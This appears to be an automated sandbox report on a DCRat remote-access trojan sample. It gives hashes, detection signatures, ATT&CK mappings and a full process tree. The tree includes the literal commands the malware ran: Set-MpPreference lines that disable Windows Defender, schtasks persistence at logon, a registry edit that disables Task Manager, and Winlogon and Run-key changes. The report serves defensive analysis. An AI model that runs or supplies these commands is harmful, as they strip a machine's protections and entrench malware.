dcrat | f64ced84f1438d56aecfa5e3d380d1a05323eb39653261ed40667316cec660bc

Analysis

max time kernel
120s
max time network
128s
platform
windows10_x64
resource
win10v20210408
submitted
21-07-2021 20:37

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

steap_host.exe
Size

1.6MB
MD5

dab849743d8384514fe4cf58f671906b
SHA1

e7e9ab0b21329fed51499fc928079a9eb99dc202
SHA256

f64ced84f1438d56aecfa5e3d380d1a05323eb39653261ed40667316cec660bc
SHA512

8ab771717c28fba589c8274fb185570f22a8168ed4fdebb2a651ef582f52e3690fff9ef1886cd6a553ab51ffb4b39843cc9135bdf306e39af61992411ab164d2

Score

10^/10

dcrat evasion infostealer persistence rat trojan

Malware Config

Signatures

Contains code to disable Windows Defender 1 IoCs

A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

Processes:

resource	yara_rule
behavioral1/memory/688-143-0x000000001AC00000-0x000000001AC02000-memory.dmp	disable_win_def

DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
rat infostealer dcrat

Modifies WinLogon for persistence 2 TTPs 5 IoCs

persistence

Winlogon Helper DLL

T1004

Modify Registry

T1112

Processes:

NvidiaHostMonitorreviewhost.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Windows\\System32\\setx\\lsass.exe\""	NvidiaHostMonitorreviewhost.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Windows\\System32\\setx\\lsass.exe\", \"C:\\NvidiaCache\\NvidiaHostSupport\\NvidiaMonitorResources\\NGmmqAt3B7dl7fpoQLIc0QA0gqq2\\NvidiaHostMonitorreviewhost.exe\""	NvidiaHostMonitorreviewhost.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Windows\\System32\\setx\\lsass.exe\", \"C:\\NvidiaCache\\NvidiaHostSupport\\NvidiaMonitorResources\\NGmmqAt3B7dl7fpoQLIc0QA0gqq2\\NvidiaHostMonitorreviewhost.exe\", \"C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeClickToRun\\OfficeClickToRun.exe\""	NvidiaHostMonitorreviewhost.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Windows\\System32\\setx\\lsass.exe\", \"C:\\NvidiaCache\\NvidiaHostSupport\\NvidiaMonitorResources\\NGmmqAt3B7dl7fpoQLIc0QA0gqq2\\NvidiaHostMonitorreviewhost.exe\", \"C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeClickToRun\\OfficeClickToRun.exe\", \"C:\\Windows\\System32\\BackgroundTransferHost\\dllhost.exe\""	NvidiaHostMonitorreviewhost.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Windows\\System32\\setx\\lsass.exe\", \"C:\\NvidiaCache\\NvidiaHostSupport\\NvidiaMonitorResources\\NGmmqAt3B7dl7fpoQLIc0QA0gqq2\\NvidiaHostMonitorreviewhost.exe\", \"C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeClickToRun\\OfficeClickToRun.exe\", \"C:\\Windows\\System32\\BackgroundTransferHost\\dllhost.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\csrss.exe\""	NvidiaHostMonitorreviewhost.exe

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089

DCRat Payload 4 IoCs

Detects payload of DCRat, commonly dropped by NSIS installers.

rat

Processes:

resource	yara_rule
C:\NvidiaCache\NvidiaHostSupport\NvidiaMonitorResources\NvidiaHostMonitorreviewhost.exe	dcrat
C:\NvidiaCache\NvidiaHostSupport\NvidiaMonitorResources\NvidiaHostMonitorreviewhost.exe	dcrat
C:\Windows\System32\BackgroundTransferHost\dllhost.exe	dcrat
C:\Windows\System32\BackgroundTransferHost\dllhost.exe	dcrat

Disables Task Manager via registry modification
evasion
Executes dropped EXE 2 IoCs

Processes:

NvidiaHostMonitorreviewhost.exedllhost.exe

pid process

3296 NvidiaHostMonitorreviewhost.exe
688 dllhost.exe

Adds Run key to start application 2 TTPs 10 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

NvidiaHostMonitorreviewhost.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\lsass = "\"C:\\Windows\\System32\\setx\\lsass.exe\""	NvidiaHostMonitorreviewhost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run\OfficeClickToRun = "\"C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeClickToRun\\OfficeClickToRun.exe\""	NvidiaHostMonitorreviewhost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\Windows\\System32\\BackgroundTransferHost\\dllhost.exe\""	NvidiaHostMonitorreviewhost.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\Windows\\System32\\BackgroundTransferHost\\dllhost.exe\""	NvidiaHostMonitorreviewhost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\csrss.exe\""	NvidiaHostMonitorreviewhost.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\csrss.exe\""	NvidiaHostMonitorreviewhost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run\lsass = "\"C:\\Windows\\System32\\setx\\lsass.exe\""	NvidiaHostMonitorreviewhost.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\NvidiaHostMonitorreviewhost = "\"C:\\NvidiaCache\\NvidiaHostSupport\\NvidiaMonitorResources\\NGmmqAt3B7dl7fpoQLIc0QA0gqq2\\NvidiaHostMonitorreviewhost.exe\""	NvidiaHostMonitorreviewhost.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OfficeClickToRun = "\"C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeClickToRun\\OfficeClickToRun.exe\""	NvidiaHostMonitorreviewhost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run\NvidiaHostMonitorreviewhost = "\"C:\\NvidiaCache\\NvidiaHostSupport\\NvidiaMonitorResources\\NGmmqAt3B7dl7fpoQLIc0QA0gqq2\\NvidiaHostMonitorreviewhost.exe\""	NvidiaHostMonitorreviewhost.exe

Drops file in System32 directory 5 IoCs

Processes:

NvidiaHostMonitorreviewhost.exe

description	ioc	process
File created	C:\Windows\System32\setx\lsass.exe	NvidiaHostMonitorreviewhost.exe
File opened for modification	C:\Windows\System32\setx\lsass.exe	NvidiaHostMonitorreviewhost.exe
File created	C:\Windows\System32\setx\6203df4a6bafc7c328ee7f6f8ca0a8a838a8a1b9	NvidiaHostMonitorreviewhost.exe
File created	C:\Windows\System32\BackgroundTransferHost\dllhost.exe	NvidiaHostMonitorreviewhost.exe
File created	C:\Windows\System32\BackgroundTransferHost\5940a34987c99120d96dace90a3f93f329dcad63	NvidiaHostMonitorreviewhost.exe

Drops file in Program Files directory 4 IoCs

Processes:

NvidiaHostMonitorreviewhost.exe

description	ioc	process
File created	C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun\OfficeClickToRun.exe	NvidiaHostMonitorreviewhost.exe
File created	C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun\e6c9b481da804f07baff8eff543b0a1441069b5d	NvidiaHostMonitorreviewhost.exe
File created	C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\csrss.exe	NvidiaHostMonitorreviewhost.exe
File created	C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\886983d96e3d3e31032c679b2d4ea91b6c05afef	NvidiaHostMonitorreviewhost.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

2448 schtasks.exe
4008 schtasks.exe
2088 schtasks.exe
2188 schtasks.exe
640 schtasks.exe

pid	process
2448	schtasks.exe
4008	schtasks.exe
2088	schtasks.exe
2188	schtasks.exe
640	schtasks.exe

Modifies registry class 2 IoCs

Processes:

steap_host.exeNvidiaHostMonitorreviewhost.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings	steap_host.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings	NvidiaHostMonitorreviewhost.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

4056 reg.exe
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

936 PING.EXE

pid	process
4056	reg.exe

pid	process
936	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

NvidiaHostMonitorreviewhost.exedllhost.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
3296	NvidiaHostMonitorreviewhost.exe
3296	NvidiaHostMonitorreviewhost.exe
3296	NvidiaHostMonitorreviewhost.exe
688	dllhost.exe
688	dllhost.exe
688	dllhost.exe
3984	powershell.exe
3984	powershell.exe
3984	powershell.exe
688	dllhost.exe
688	dllhost.exe
688	dllhost.exe
688	dllhost.exe
688	dllhost.exe
4080	powershell.exe
196	powershell.exe
936	powershell.exe
688	dllhost.exe
2748	powershell.exe
2272	powershell.exe
2272	powershell.exe
688	dllhost.exe
688	dllhost.exe
500	powershell.exe
500	powershell.exe
688	dllhost.exe
1172	powershell.exe
1172	powershell.exe
4080	powershell.exe
4080	powershell.exe
500	powershell.exe
688	dllhost.exe
936	powershell.exe
936	powershell.exe
196	powershell.exe
196	powershell.exe
2904	powershell.exe
2904	powershell.exe
500	powershell.exe
2748	powershell.exe
2748	powershell.exe
4080	powershell.exe
2272	powershell.exe
688	dllhost.exe
4184	powershell.exe
4184	powershell.exe
4308	powershell.exe
4308	powershell.exe
1172	powershell.exe
4436	powershell.exe
4436	powershell.exe
688	dllhost.exe
688	dllhost.exe
4560	powershell.exe
4560	powershell.exe
2904	powershell.exe
196	powershell.exe
936	powershell.exe
688	dllhost.exe
4184	powershell.exe
4308	powershell.exe
688	dllhost.exe
4436	powershell.exe
4560	powershell.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

dllhost.exe

pid process

688 dllhost.exe

pid	process
688	dllhost.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

description	pid	process
Token: SeDebugPrivilege	3296	NvidiaHostMonitorreviewhost.exe
Token: SeDebugPrivilege	688	dllhost.exe
Token: SeDebugPrivilege	3984	powershell.exe
Token: SeIncreaseQuotaPrivilege	3984	powershell.exe
Token: SeSecurityPrivilege	3984	powershell.exe
Token: SeTakeOwnershipPrivilege	3984	powershell.exe
Token: SeLoadDriverPrivilege	3984	powershell.exe
Token: SeSystemProfilePrivilege	3984	powershell.exe
Token: SeSystemtimePrivilege	3984	powershell.exe
Token: SeProfSingleProcessPrivilege	3984	powershell.exe
Token: SeIncBasePriorityPrivilege	3984	powershell.exe
Token: SeCreatePagefilePrivilege	3984	powershell.exe
Token: SeBackupPrivilege	3984	powershell.exe
Token: SeRestorePrivilege	3984	powershell.exe
Token: SeShutdownPrivilege	3984	powershell.exe
Token: SeDebugPrivilege	3984	powershell.exe
Token: SeSystemEnvironmentPrivilege	3984	powershell.exe
Token: SeRemoteShutdownPrivilege	3984	powershell.exe
Token: SeUndockPrivilege	3984	powershell.exe
Token: SeManageVolumePrivilege	3984	powershell.exe
Token: 33	3984	powershell.exe
Token: 34	3984	powershell.exe
Token: 35	3984	powershell.exe
Token: 36	3984	powershell.exe
Token: SeDebugPrivilege	4080	powershell.exe
Token: SeDebugPrivilege	196	powershell.exe
Token: SeDebugPrivilege	936	powershell.exe
Token: SeDebugPrivilege	2748	powershell.exe
Token: SeDebugPrivilege	2272	powershell.exe
Token: SeDebugPrivilege	500	powershell.exe
Token: SeDebugPrivilege	1172	powershell.exe
Token: SeDebugPrivilege	2904	powershell.exe
Token: SeDebugPrivilege	4184	powershell.exe
Token: SeDebugPrivilege	4308	powershell.exe
Token: SeDebugPrivilege	4436	powershell.exe
Token: SeDebugPrivilege	4560	powershell.exe
Token: SeIncreaseQuotaPrivilege	500	powershell.exe
Token: SeSecurityPrivilege	500	powershell.exe
Token: SeTakeOwnershipPrivilege	500	powershell.exe
Token: SeLoadDriverPrivilege	500	powershell.exe
Token: SeSystemProfilePrivilege	500	powershell.exe
Token: SeSystemtimePrivilege	500	powershell.exe
Token: SeProfSingleProcessPrivilege	500	powershell.exe
Token: SeIncBasePriorityPrivilege	500	powershell.exe
Token: SeCreatePagefilePrivilege	500	powershell.exe
Token: SeBackupPrivilege	500	powershell.exe
Token: SeRestorePrivilege	500	powershell.exe
Token: SeShutdownPrivilege	500	powershell.exe
Token: SeDebugPrivilege	500	powershell.exe
Token: SeSystemEnvironmentPrivilege	500	powershell.exe
Token: SeRemoteShutdownPrivilege	500	powershell.exe
Token: SeUndockPrivilege	500	powershell.exe
Token: SeManageVolumePrivilege	500	powershell.exe
Token: 33	500	powershell.exe
Token: 34	500	powershell.exe
Token: 35	500	powershell.exe
Token: 36	500	powershell.exe
Token: SeIncreaseQuotaPrivilege	4080	powershell.exe
Token: SeSecurityPrivilege	4080	powershell.exe
Token: SeTakeOwnershipPrivilege	4080	powershell.exe
Token: SeLoadDriverPrivilege	4080	powershell.exe
Token: SeSystemProfilePrivilege	4080	powershell.exe
Token: SeSystemtimePrivilege	4080	powershell.exe
Token: SeProfSingleProcessPrivilege	4080	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

dllhost.exe

pid process

688 dllhost.exe

pid	process
688	dllhost.exe

Suspicious use of WriteProcessMemory 55 IoCs

Processes:

steap_host.exeWScript.execmd.exeNvidiaHostMonitorreviewhost.execmd.exedllhost.exe

description	pid	process	target process
PID 632 wrote to memory of 4080	632	steap_host.exe	WScript.exe
PID 632 wrote to memory of 4080	632	steap_host.exe	WScript.exe
PID 632 wrote to memory of 4080	632	steap_host.exe	WScript.exe
PID 4080 wrote to memory of 2352	4080	WScript.exe	cmd.exe
PID 4080 wrote to memory of 2352	4080	WScript.exe	cmd.exe
PID 4080 wrote to memory of 2352	4080	WScript.exe	cmd.exe
PID 2352 wrote to memory of 3296	2352	cmd.exe	NvidiaHostMonitorreviewhost.exe
PID 2352 wrote to memory of 3296	2352	cmd.exe	NvidiaHostMonitorreviewhost.exe
PID 3296 wrote to memory of 2188	3296	NvidiaHostMonitorreviewhost.exe	schtasks.exe
PID 3296 wrote to memory of 2188	3296	NvidiaHostMonitorreviewhost.exe	schtasks.exe
PID 3296 wrote to memory of 640	3296	NvidiaHostMonitorreviewhost.exe	schtasks.exe
PID 3296 wrote to memory of 640	3296	NvidiaHostMonitorreviewhost.exe	schtasks.exe
PID 3296 wrote to memory of 2448	3296	NvidiaHostMonitorreviewhost.exe	schtasks.exe
PID 3296 wrote to memory of 2448	3296	NvidiaHostMonitorreviewhost.exe	schtasks.exe
PID 3296 wrote to memory of 4008	3296	NvidiaHostMonitorreviewhost.exe	schtasks.exe
PID 3296 wrote to memory of 4008	3296	NvidiaHostMonitorreviewhost.exe	schtasks.exe
PID 3296 wrote to memory of 2088	3296	NvidiaHostMonitorreviewhost.exe	schtasks.exe
PID 3296 wrote to memory of 2088	3296	NvidiaHostMonitorreviewhost.exe	schtasks.exe
PID 3296 wrote to memory of 3976	3296	NvidiaHostMonitorreviewhost.exe	cmd.exe
PID 3296 wrote to memory of 3976	3296	NvidiaHostMonitorreviewhost.exe	cmd.exe
PID 2352 wrote to memory of 4056	2352	cmd.exe	reg.exe
PID 2352 wrote to memory of 4056	2352	cmd.exe	reg.exe
PID 2352 wrote to memory of 4056	2352	cmd.exe	reg.exe
PID 3976 wrote to memory of 3240	3976	cmd.exe	chcp.com
PID 3976 wrote to memory of 3240	3976	cmd.exe	chcp.com
PID 3976 wrote to memory of 936	3976	cmd.exe	PING.EXE
PID 3976 wrote to memory of 936	3976	cmd.exe	PING.EXE
PID 3976 wrote to memory of 688	3976	cmd.exe	dllhost.exe
PID 3976 wrote to memory of 688	3976	cmd.exe	dllhost.exe
PID 688 wrote to memory of 3984	688	dllhost.exe	powershell.exe
PID 688 wrote to memory of 3984	688	dllhost.exe	powershell.exe
PID 688 wrote to memory of 4080	688	dllhost.exe	powershell.exe
PID 688 wrote to memory of 4080	688	dllhost.exe	powershell.exe
PID 688 wrote to memory of 196	688	dllhost.exe	powershell.exe
PID 688 wrote to memory of 196	688	dllhost.exe	powershell.exe
PID 688 wrote to memory of 936	688	dllhost.exe	powershell.exe
PID 688 wrote to memory of 936	688	dllhost.exe	powershell.exe
PID 688 wrote to memory of 2748	688	dllhost.exe	powershell.exe
PID 688 wrote to memory of 2748	688	dllhost.exe	powershell.exe
PID 688 wrote to memory of 2272	688	dllhost.exe	powershell.exe
PID 688 wrote to memory of 2272	688	dllhost.exe	powershell.exe
PID 688 wrote to memory of 500	688	dllhost.exe	powershell.exe
PID 688 wrote to memory of 500	688	dllhost.exe	powershell.exe
PID 688 wrote to memory of 1172	688	dllhost.exe	powershell.exe
PID 688 wrote to memory of 1172	688	dllhost.exe	powershell.exe
PID 688 wrote to memory of 2904	688	dllhost.exe	powershell.exe
PID 688 wrote to memory of 2904	688	dllhost.exe	powershell.exe
PID 688 wrote to memory of 4184	688	dllhost.exe	powershell.exe
PID 688 wrote to memory of 4184	688	dllhost.exe	powershell.exe
PID 688 wrote to memory of 4308	688	dllhost.exe	powershell.exe
PID 688 wrote to memory of 4308	688	dllhost.exe	powershell.exe
PID 688 wrote to memory of 4436	688	dllhost.exe	powershell.exe
PID 688 wrote to memory of 4436	688	dllhost.exe	powershell.exe
PID 688 wrote to memory of 4560	688	dllhost.exe	powershell.exe
PID 688 wrote to memory of 4560	688	dllhost.exe	powershell.exe

C:\Users\Admin\AppData\Local\Temp\steap_host.exe
"C:\Users\Admin\AppData\Local\Temp\steap_host.exe"
1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:632
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\NvidiaCache\NvidiaHostSupport\NvidiaMonitorResources\r4vRIa2CNz4SVCALrUg.vbe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4080
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\NvidiaCache\NvidiaHostSupport\NvidiaMonitorResources\NGmmqAt3B7dl7fpoQLIc0QA0gqq2.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2352
  - - C:\NvidiaCache\NvidiaHostSupport\NvidiaMonitorResources\NvidiaHostMonitorreviewhost.exe
      "C:\NvidiaCache\NvidiaHostSupport\NvidiaMonitorResources\NvidiaHostMonitorreviewhost.exe"
      4⤵
      Modifies WinLogon for persistence
      Executes dropped EXE
      Adds Run key to start application
      Drops file in System32 directory
      Drops file in Program Files directory
      Modifies registry class
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:3296
    - - C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "lsass" /sc ONLOGON /tr "'C:\Windows\System32\setx\lsass.exe'" /rl HIGHEST /f
        5⤵
        Creates scheduled task(s)
        
        PID:2188
    - - C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "NvidiaHostMonitorreviewhost" /sc ONLOGON /tr "'C:\NvidiaCache\NvidiaHostSupport\NvidiaMonitorResources\NGmmqAt3B7dl7fpoQLIc0QA0gqq2\NvidiaHostMonitorreviewhost.exe'" /rl HIGHEST /f
        5⤵
        Creates scheduled task(s)
        
        PID:640
    - - C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "OfficeClickToRun" /sc ONLOGON /tr "'C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun\OfficeClickToRun.exe'" /rl HIGHEST /f
        5⤵
        Creates scheduled task(s)
        
        PID:2448
    - - C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "dllhost" /sc ONLOGON /tr "'C:\Windows\System32\BackgroundTransferHost\dllhost.exe'" /rl HIGHEST /f
        5⤵
        Creates scheduled task(s)
        
        PID:4008
    - - C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "csrss" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\csrss.exe'" /rl HIGHEST /f
        5⤵
        Creates scheduled task(s)
        
        PID:2088
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\QO4U6mpYDF.bat"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:3976
      - C:\Windows\system32\chcp.com
        
        chcp 65001
        6⤵
        
        PID:3240
      - C:\Windows\system32\PING.EXE
        
        ping -n 5 localhost
        6⤵
        Runs ping.exe
        
        PID:936
      - C:\Windows\System32\BackgroundTransferHost\dllhost.exe
        
        "C:\Windows\System32\BackgroundTransferHost\dllhost.exe"
        6⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: GetForegroundWindowSpam
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:688
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" Get-MpPreference -verbose
        7⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3984
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true
        7⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4080
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true
        7⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:196
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true
        7⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:936
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true
        7⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2748
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true
        7⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2272
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force
        7⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:500
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 6
        7⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1172
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 0
        7⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2904
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 6
        7⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4184
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 6
        7⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4308
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true
        7⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4436
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 2
        7⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4560
  - - C:\Windows\SysWOW64\reg.exe
      reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
      4⤵
      Modifies registry key
      PID:4056

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Winlogon Helper DLL

T1004

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Disabling Security Tools

T1089

Modify Registry

T1112

Credential Access

Discovery

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\NvidiaCache\NvidiaHostSupport\NvidiaMonitorResources\NGmmqAt3B7dl7fpoQLIc0QA0gqq2.bat

MD5
13604b90513a454948d17e8f3374850e

SHA1
210c0f0d7b689eeeb6e6246181f33fb79f6cda42

SHA256
449394b7f1759168b3bbbb42e55ddc4714464b21a408ff4021fa26e1c4a84300

SHA512
d8ea57bb5b8a80aa51fbd64e6a5d652d42383e440f847c0d49f50fa2a3467b61a102df6ac0b629fd9ce1f2b49d5a2b87824254d9e3d7493f656b2708ae04513b

Download Submit
C:\NvidiaCache\NvidiaHostSupport\NvidiaMonitorResources\NvidiaHostMonitorreviewhost.exe

MD5
9c0182987fea6a2e8e517606d06346b1

SHA1
cc8b28475fecd46132cf19660c1911c324eab032

SHA256
4c7a2c1f64dc9c44c4f5380bd0a847a30acc0050a73efbcca760453951688b56

SHA512
bd683b2446c8cf4f4e79ac9929e7fff0e86de28dcc5933f3f9b6650d6be412dc6eec45e3c08181143b7060193095e0b6780c569823f038c18b1abac7631469d3

Download Submit
C:\NvidiaCache\NvidiaHostSupport\NvidiaMonitorResources\NvidiaHostMonitorreviewhost.exe

MD5
9c0182987fea6a2e8e517606d06346b1

SHA1
cc8b28475fecd46132cf19660c1911c324eab032

SHA256
4c7a2c1f64dc9c44c4f5380bd0a847a30acc0050a73efbcca760453951688b56

SHA512
bd683b2446c8cf4f4e79ac9929e7fff0e86de28dcc5933f3f9b6650d6be412dc6eec45e3c08181143b7060193095e0b6780c569823f038c18b1abac7631469d3

Download Submit
C:\NvidiaCache\NvidiaHostSupport\NvidiaMonitorResources\r4vRIa2CNz4SVCALrUg.vbe

MD5
71a2687eef1521d10b88a3bdf8ced367

SHA1
174f938036f1fae9b4dde50436daf40c04992c1a

SHA256
a4713019dc786a62c05d92f0edb20b1193d4b614d3529867aba42adab612c7db

SHA512
f730d9be752264e6cf1f267427103b441b05ce368f0dcb45d8c5191f76479f56a0873906235e26c33db418486119795ff7f6324649c1c260ad190b38c67e410d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5
8592ba100a78835a6b94d5949e13dfc1

SHA1
63e901200ab9a57c7dd4c078d7f75dcd3b357020

SHA256
